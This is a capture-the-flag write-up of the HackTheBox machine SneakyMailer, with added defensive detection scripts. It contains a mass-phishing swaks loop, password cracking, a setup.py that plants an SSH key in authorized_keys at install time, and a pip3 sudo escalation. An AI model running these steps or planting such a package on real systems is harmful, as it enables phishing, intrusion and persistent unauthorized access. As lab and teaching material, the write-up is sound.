Hackthebox - SneakyMailer

Summary

SneakyMailer was a medium-difficulty Linux box created by Hackthebox user sulcud. The box was all about building a mailing list from the emails found on the website, using swaks to send a phishing mail to all the employees, and getting a hit back with one user's email credentials. Logging in to that mailbox we find credentials for the dev FTP. Using them we can upload a shell, visit it on the dev subdomain and get a shell back. After getting the shell we can reuse the FTP credentials to switch to the developer user. In the pypi web root we also find a .htpasswd, and we can crack the password from its hash. Visiting that site we see it is a Python package registry, so we create a custom package and upload it to get a shell as low. Checking sudo -l we see we can run pip3 without a password, so using GTFOBins we can get root.

Initial Enumeration

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 16:59 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 4.25% done; ETC: 17:00 (0:00:45 remaining)
Nmap scan report for 10.10.10.197
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS QUOTA IMAP4rev1 CAPABILITY STARTTLS ACL2=UNION ENABLE SORT THREAD=REFERENCES NAMESPACE IDLE CHILDREN OK completed THREAD=ORDEREDSUBJECT UTF8=ACCEPTA0001 ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS QUOTA IMAP4rev1 CAPABILITY ACL2=UNION ENABLE SORT AUTH=PLAIN THREAD=REFERENCES NAMESPACE IDLE CHILDREN OK completed THREAD=ORDEREDSUBJECT UTF8=ACCEPTA0001 ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.77 seconds

We have a lot of open ports; let's start with port 80.

Web Port 80

In the nmap result the http-title reads "Did not follow redirect to http://sneakycorp.htb", so let's add sneakycorp.htb to /etc/hosts and look at the website.

sneakycorp.htb

As we have a custom domain, let's also enumerate for custom subdomains while we poke at the website.

The team page of the site shows us a few emails.

So I collected all the emails from the webpage and made an email list.

We also find something with vhost brute-forcing:

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -u http://sneakycorp.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://sneakycorp.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/29 17:17:58 Starting gobuster
===============================================================
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]

Let's add that to /etc/hosts as well and check that page.

dev.sneakycorp.htb

It looks like the development version of the same website,

and we also have a register page.

Trying to register, I don't see it doing anything else.

SMTP?

As we have an email list and an SMTP server, I thought of spoofing mail to all the addresses.

I chose angelicaramos@sneakymailer.htb as the From address, as it was the CEO's email id.

Using swaks

swaks --from "angelicaramos@sneakymailer.htb" --body "Test" --to angelicaramos@sneakymailer.htb
=== Trying sneakymailer.htb:25...
=== Connected to sneakymailer.htb.
<- 220 debian ESMTP Postfix (Debian/GNU)
-> EHLO hackthebox
<- 250-debian
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250-SMTPUTF8
<- 250 CHUNKING
-> MAIL FROM:<angelicaramos@sneakymailer.htb>
<- 250 2.1.0 Ok
-> RCPT TO:<angelicaramos@sneakymailer.htb>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Sat, 29 Aug 2020 17:36:22 +0530
-> To: angelicaramos@sneakymailer.htb
-> From: angelicaramos@sneakymailer.htb
-> Subject: test Sat, 29 Aug 2020 17:36:22 +0530
-> Message-Id: <20200829173622.070002@hackthebox>
-> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
->
-> Test
->
->
-> .
<- 250 2.0.0 Ok: queued as 287F5248DD
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.
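What the session above really shows, from the defender's side, is an MTA that accepts a MAIL FROM claiming its own domain from a client that never authenticated. As an added example (not part of the original writeup), here is a small Python check that walks a transcript in the same "-> client / <- server" shape swaks prints and flags exactly that: an internal-domain sender accepted with 250 on a session with no successful AUTH (reply 235). The two transcripts and the list of internal domains are constructed for the example.

```python
import re

# Constructed transcripts in the "-> client / <- server" shape swaks prints.
# SPOOFED mirrors the session above: no AUTH, yet an internal sender is accepted.
SPOOFED = """\
<- 220 debian ESMTP Postfix (Debian/GNU)
-> EHLO hackthebox
<- 250-debian
<- 250 CHUNKING
-> MAIL FROM:<angelicaramos@sneakymailer.htb>
<- 250 2.1.0 Ok
-> RCPT TO:<angelicaramos@sneakymailer.htb>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> .
<- 250 2.0.0 Ok: queued as 287F5248DD
"""

# AUTHENTICATED is what the same submission looks like when the client logs in first.
AUTHENTICATED = """\
<- 220 debian ESMTP Postfix (Debian/GNU)
-> EHLO hackthebox
<- 250 CHUNKING
-> AUTH PLAIN <base64-credentials>
<- 235 2.7.0 Authentication successful
-> MAIL FROM:<angelicaramos@sneakymailer.htb>
<- 250 2.1.0 Ok
-> .
<- 250 2.0.0 Ok: queued as 0000000000
"""

# Domains this MTA is authoritative for (assumed for the example).
INTERNAL_DOMAINS = {"sneakymailer.htb", "sneakycorp.htb"}
MAIL_FROM_RE = re.compile(r"^MAIL FROM:<([^>]*)>", re.IGNORECASE)
QUEUED_RE = re.compile(r"queued as (\S+)")


def parse_transcript(text):
    """Yield ('C', line) for client lines and ('S', line) for server lines."""
    for raw in text.splitlines():
        if raw.startswith("-> "):
            yield "C", raw[3:]
        elif raw.startswith("<- "):
            yield "S", raw[3:]


def find_spoofed_sender(text, internal_domains=INTERNAL_DOMAINS):
    """Return details of a MAIL FROM that claims an internal domain and was
    accepted (250) on a session that never authenticated (no 235 reply),
    or None when the session looks legitimate."""
    authenticated = False
    pending = None          # MAIL FROM address waiting for the server's reply
    finding = None
    for direction, line in parse_transcript(text):
        if direction == "C":
            m = MAIL_FROM_RE.match(line)
            if m:
                pending = m.group(1)
            continue
        code = line[:3]
        if code == "235":   # SMTP AUTH succeeded
            authenticated = True
        if pending is not None:
            if code == "250":
                domain = pending.rpartition("@")[2].lower()
                if domain in internal_domains and not authenticated:
                    finding = {"sender": pending, "domain": domain, "queued_as": None}
            pending = None
        if finding is not None:
            q = QUEUED_RE.search(line)
            if q:
                finding["queued_as"] = q.group(1)
    return finding


if __name__ == "__main__":
    print("spoofed session:", find_spoofed_sender(SPOOFED))
    print("authenticated session:", find_spoofed_sender(AUTHENTICATED))
```

The fix on the server side is a sender restriction: only authenticated sessions (or trusted networks) may use the organisation's own domain in MAIL FROM; in Postfix that is the role of smtpd_sender_login_maps together with reject_sender_login_mismatch.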

We see we can send mail, so let's try sending a URL to all the addresses:

#!/bin/bash

# One swaks call per address in emails.list; the body is just the link to our listener
while IFS= read -r line; do
    echo "Sending Mail to: $line"
    swaks --from "angelicaramos@sneakymailer.htb" --body "http://10.10.14.12:8000/" --to "$line" > /dev/null
done < emails.list
POST / HTTP/1.1
Host: 10.10.14.12:8000
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

After URL-decoding the form body, that gives us the credentials paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Trying them on SSH and FTP we get invalid credentials, so let's try IMAP.

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it

FTP

Logging in to FTP with the developer credentials, we see we can upload files. I tested that by uploading a test.txt and visiting it on the dev subdomain.

Shell (www-data)

Running ls:

Looking in the pypi folder we find a .htpasswd,

and we crack the hash using john:

john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
soufianeelhaoui (pypi)
1g 0:00:00:42 DONE (2020-08-29 23:02) 0.02331g/s 83335p/s 83335c/s 83335C/s souheib2..souderton16
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We get the password soufianeelhaoui.

Also, reusing the developer password we found for FTP, we can switch to the developer user.

Developer

Web Pypi(8080)

Seeing that it is a PyPI registry, let's create a Python package and try to upload it to the server.
I created and uploaded the package following

https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/

Creating .pypirc

Checking https://pypi.org/project/pypiserver/#upload-with-setuptools

we see we need to have a ~/.pypirc to contain the credentials and host

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

setup.py

For code execution I chose to write my public key to /home/low/.ssh/authorized_keys,

so I wrote a setup.py accordingly with the help of https://packaging.python.org/tutorials/packaging-projects/

import setuptools

# Module-level code runs whenever the sdist is built or installed, before
# setup() is reached; this appends our public key for the user low.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa <public key> ")
except Exception:
    pass

setuptools.setup(
    name="example-pkg-YOUR-USERNAME-HERE",  # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="long",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

And using setup.py sdist we can upload to the server

https://zestreleaser.readthedocs.io/en/latest/uploading.html

python3 setup.py sdist register -r local upload -r local
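The reason this works is that setup.py is ordinary Python executed by whoever builds or installs the package, so anything outside the setup() call runs with that user's privileges. As an added example (not part of the original writeup, and not the server's own tooling), here is a Python audit that parses a setup.py with the standard ast module and reports top-level statements that would execute at install time, plus calls to file or process primitives anywhere in the file. The two sample setup.py sources are constructed; the first is modelled on the one above.

```python
import ast

# Constructed sample modelled on the setup.py above: a try/with block at module
# level that writes a file before setup() is called.
SUSPICIOUS_SETUP = '''
import setuptools

try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\\nssh-rsa <public key> ")
except Exception:
    pass

setuptools.setup(name="example-pkg", version="0.0.1",
                 packages=setuptools.find_packages())
'''

# Constructed clean sample: only an import and the metadata call.
CLEAN_SETUP = '''
"""Package metadata."""
import setuptools

VERSION = "0.0.1"
setuptools.setup(name="example-pkg", version=VERSION,
                 packages=setuptools.find_packages())
'''

RISKY_MODULES = {"os", "subprocess", "socket", "urllib", "requests", "shutil", "ctypes"}
RISKY_CALLS = {"open", "exec", "eval", "system", "popen", "run", "Popen", "urlopen"}


def _call_name(call):
    """Name of the function being called: 'setup' for both setup() and x.setup()."""
    func = call.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)


def _is_setup_call(node):
    return (isinstance(node, ast.Expr) and isinstance(node.value, ast.Call)
            and _call_name(node.value) == "setup")


def audit_setup_py(source):
    """Return sorted (lineno, reason) findings for code in a setup.py that would
    run at build/install time outside the setup() metadata call."""
    tree = ast.parse(source)
    findings = set()
    for node in tree.body:
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name.split(".")[0] for a in node.names]
            if isinstance(node, ast.ImportFrom) and node.module:
                names.append(node.module.split(".")[0])
            for n in names:
                if n in RISKY_MODULES:
                    findings.add((node.lineno, f"imports {n}"))
            continue
        # Metadata assignments, definitions and docstrings are normal in a setup.py
        if isinstance(node, (ast.Assign, ast.AnnAssign, ast.FunctionDef,
                             ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        if isinstance(node, ast.Expr) and isinstance(node.value, ast.Constant):
            continue
        if _is_setup_call(node):
            continue
        findings.add((node.lineno, f"top-level {type(node).__name__} runs at install time"))
    # Calls to file/process primitives anywhere, including inside try/with bodies
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in RISKY_CALLS:
            findings.add((node.lineno, f"calls {_call_name(node)}()"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("clean", CLEAN_SETUP)):
        print(label, audit_setup_py(src))
```

This is a triage aid, not a verdict: a legitimate setup.py can read a README with open(), and a hostile one can hide its payload in a custom cmdclass that only runs on install. The practical mitigation on a private index is to require authentication for uploads (the .htpasswd here was crackable in under a minute) and to build wheels in an isolated environment rather than running arbitrary sdists as a shell user.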

Low

SSH-ing in with the private key we get a shell.

Checking sudo -l reveals:

Privilege Escalation

Running sudo -l reveals that we can run pip3 via sudo without a password, so checking GTFOBins we can use that to get a shell as root.
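A passwordless sudo rule for a package manager or interpreter is the kind of entry that should never survive an audit, because such binaries can spawn a shell or write arbitrary files as the target user. As an added example (not part of the original writeup), here is a Python parser for sudo -l output that lists every rule and flags commands whose binary is shell-capable, noting whether it is NOPASSWD. The sudo -l output is constructed to match what the writeup describes (the page itself shows no listing), and the set of shell-capable binaries is an assumed shortlist drawn from the kind of entries GTFOBins catalogues.

```python
import os
import re

# Constructed sudo -l listing matching the situation described above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip3
    (root) /usr/bin/systemctl restart nginx
"""

# Assumed shortlist of binaries that can spawn a shell or write files when run
# with elevated rights (package managers, interpreters, editors, pagers).
SHELL_CAPABLE = {"pip", "pip3", "python", "python2", "python3", "perl", "ruby",
                 "node", "bash", "sh", "zsh", "env", "find", "awk", "vim", "vi",
                 "less", "more", "nano", "tar", "zip", "apt", "apt-get", "npm", "gem"}

RUNAS_RE = re.compile(r"^\(([^)]*)\)\s*")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC|"
                    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL):\s*")


def parse_sudo_l(text):
    """Parse the command section of `sudo -l` into dicts with runas, tags and
    command. Simplification: tags apply to every command on the same line."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands or not line.startswith((" ", "\t")):
            continue
        rest = line.strip()
        runas = "root"                      # sudo's default when no (runas) is shown
        m = RUNAS_RE.match(rest)
        if m:
            runas = m.group(1)
            rest = rest[m.end():]
        tags = set()
        while (t := TAG_RE.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        for cmd in rest.split(", "):
            entries.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return entries


def risky_sudo_entries(text):
    """Return the entries whose binary is shell-capable (or the ALL wildcard),
    each annotated with the binary name and whether it needs no password."""
    risky = []
    for e in parse_sudo_l(text):
        first = e["command"].split()[0] if e["command"] else ""
        exe = os.path.basename(first)
        if e["command"] == "ALL" or exe in SHELL_CAPABLE:
            risky.append({**e, "binary": exe, "passwordless": "NOPASSWD" in e["tags"]})
    return risky


if __name__ == "__main__":
    for r in risky_sudo_entries(SUDO_L_OUTPUT):
        print(f"{r['runas']:>6} {'NOPASSWD' if r['passwordless'] else 'PASSWD':>8} {r['command']}")
```

The same rule-level check is worth running from the sudoers side (visudo -c -f on each file under /etc/sudoers.d) rather than only from a user's sudo -l, since it catches entries for accounts nobody has logged in as yet.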

And we have pwned SneakyMailer 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/sneakymailer/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.